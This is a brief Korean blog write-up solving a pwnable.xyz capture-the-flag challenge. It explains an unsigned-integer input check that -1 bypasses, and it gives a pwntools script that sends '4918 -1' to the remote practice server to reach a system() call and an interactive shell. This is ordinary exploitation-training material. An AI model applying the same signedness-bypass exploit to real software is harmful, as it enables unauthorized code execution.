How to Exploit
IDA
두 양수를 받아서 둘 다 4918 이하이고 차가 4919이면 system 함수를 호출한다. 사실 %u라고 해서 -1을 입력받지 못하는 건 아니다. 4918, -1 입력해주자.
Exploit Code
from pwn import *
#p=process('./challenge')
p=remote('svc.pwnable.xyz', 30001)
p.sendlineafter('input: ', '4918 -1')
p.interactive()Capture the Flag
'Writeup [pwn] > pwnable.xyz' 카테고리의 다른 글
| Two Targets - 1 (0) | 2020.03.07 |
|---|---|
| TLSv00 (0) | 2020.03.07 |
| Note (0) | 2020.03.07 |
| Misalignment (0) | 2020.03.07 |
| GrownUp (0) | 2020.03.07 |